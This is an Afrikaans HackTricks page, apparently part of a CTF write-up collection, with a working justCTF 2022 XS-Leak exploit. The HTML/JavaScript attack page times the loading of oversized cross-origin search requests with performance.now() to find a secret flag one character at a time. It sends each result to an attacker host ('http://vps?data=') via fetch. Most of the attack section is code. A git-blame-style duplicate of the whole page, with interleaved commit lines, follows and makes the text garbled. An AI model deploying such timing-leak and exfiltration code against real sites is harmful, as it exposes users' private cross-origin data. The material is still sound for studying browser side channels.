hacktricks/pentesting-web/xs-search/performance.now-+-force-heavy-task.md

# performance.now + Kragtige taak afdwing

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**Exploit geneem van [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**

In hierdie uitdaging kon die gebruiker duisende karakters stuur en as die vlag bevat was, sou die karakters teruggestuur word na die bot. Deur 'n groot hoeveelheid karakters te stuur, kon die aanvaller meet of die vlag in die gestuurde string voorkom of nie.

{% hint style="warning" %}
Aanvanklik het ek nie die objekbreedte en -hoogte ingestel nie, maar later het ek gevind dat dit belangrik is omdat die verstekgrootte te klein is om 'n verskil in die laai-tyd te maak.
{% endhint %}
```html
<!DOCTYPE html>
<html>
<head>

</head>
<body>
<img src="https://deelay.me/30000/https://example.com">
<script>
fetch('https://deelay.me/30000/https://example.com')

function send(data) {
fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)
}

function leak(char, callback) {
return new Promise(resolve => {
let ss = 'just_random_string'
let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
let start = performance.now()
let object = document.createElement('object');
object.width = '2000px'
object.height = '2000px'
object.data = url;
object.onload = () => {
object.remove()
let end = performance.now()
resolve(end - start)
}
object.onerror = () => console.log('Error event triggered');
document.body.appendChild(object);
})

}

send('start')

let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')
let flag = 'justCTF{'

async function main() {
let found = 0
let notFound = 0
for(let i=0;i<3;i++) {
await leak('..')
}
for(let i=0; i<3; i++) {
found += await leak('justCTF')
}
for(let i=0; i<3; i++) {
notFound += await leak('NOT_FOUND123')
}

found /= 3
notFound /= 3

send('found flag:'+found)
send('not found flag:'+notFound)

let threshold = found - ((found - notFound)/2)
send('threshold:'+threshold)

if (notFound > found) {
return
}

// exploit
while(true) {
if (flag[flag.length - 1] === '}') {
break
}
for(let char of charset) {
let trying = flag + char
let time = 0
for(let i=0; i<3; i++) {
time += await leak(trying)
}
time/=3
send('char:'+trying+',time:'+time)
if (time >= threshold) {
flag += char
send(flag)
break
}
}
}
}

main()

</script>
</body>

</html>
```
<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`# performance.now + Kragtige taak afdwing`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`<details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy adverteer in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFT's](https://opensea.io/collection/the-peass-family)`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`</details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Exploit geneem van [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`In hierdie uitdaging kon die gebruiker duisende karakters stuur en as die vlag bevat was, sou die karakters teruggestuur word na die bot. Deur 'n groot hoeveelheid karakters te stuur, kon die aanvaller meet of die vlag in die gestuurde string voorkom of nie.`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`{% hint style="warning" %}`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Aanvanklik het ek nie die objekbreedte en -hoogte ingestel nie, maar later het ek gevind dat dit belangrik is omdat die verstekgrootte te klein is om 'n verskil in die laai-tyd te maak.`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00			`{% endhint %}`
			```html
			`<!DOCTYPE html>`
			`<html>`
			`<head>`

			`</head>`
			`<body>`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<img src="https://deelay.me/30000/https://example.com">`
			`<script>`
			`fetch('https://deelay.me/30000/https://example.com')`

			`function send(data) {`
			`fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)`
			`}`

			`function leak(char, callback) {`
			`return new Promise(resolve => {`
			`let ss = 'just_random_string'`
			let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
			`let start = performance.now()`
			`let object = document.createElement('object');`
			`object.width = '2000px'`
			`object.height = '2000px'`
			`object.data = url;`
			`object.onload = () => {`
			`object.remove()`
			`let end = performance.now()`
			`resolve(end - start)`
			`}`
			`object.onerror = () => console.log('Error event triggered');`
			`document.body.appendChild(object);`
			`})`

			`}`

			`send('start')`

			`let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')`
			`let flag = 'justCTF{'`

			`async function main() {`
			`let found = 0`
			`let notFound = 0`
			`for(let i=0;i<3;i++) {`
			`await leak('..')`
			`}`
			`for(let i=0; i<3; i++) {`
			`found += await leak('justCTF')`
			`}`
			`for(let i=0; i<3; i++) {`
			`notFound += await leak('NOT_FOUND123')`
			`}`

			`found /= 3`
			`notFound /= 3`

			`send('found flag:'+found)`
			`send('not found flag:'+notFound)`

			`let threshold = found - ((found - notFound)/2)`
			`send('threshold:'+threshold)`

			`if (notFound > found) {`
			`return`
			`}`

			`// exploit`
			`while(true) {`
			`if (flag[flag.length - 1] === '}') {`
			`break`
			`}`
			`for(let char of charset) {`
			`let trying = flag + char`
			`let time = 0`
			`for(let i=0; i<3; i++) {`
			`time += await leak(trying)`
			`}`
			`time/=3`
			`send('char:'+trying+',time:'+time)`
			`if (time >= threshold) {`
			`flag += char`
			`send(flag)`
			`break`
			`}`
			`}`
			`}`
			`}`

			`main()`

			`</script>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00			`</body>`

			`</html>`
			```
			`<details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3730] No subject 2023-01-02 20:55:19 +00:00
			`</details>`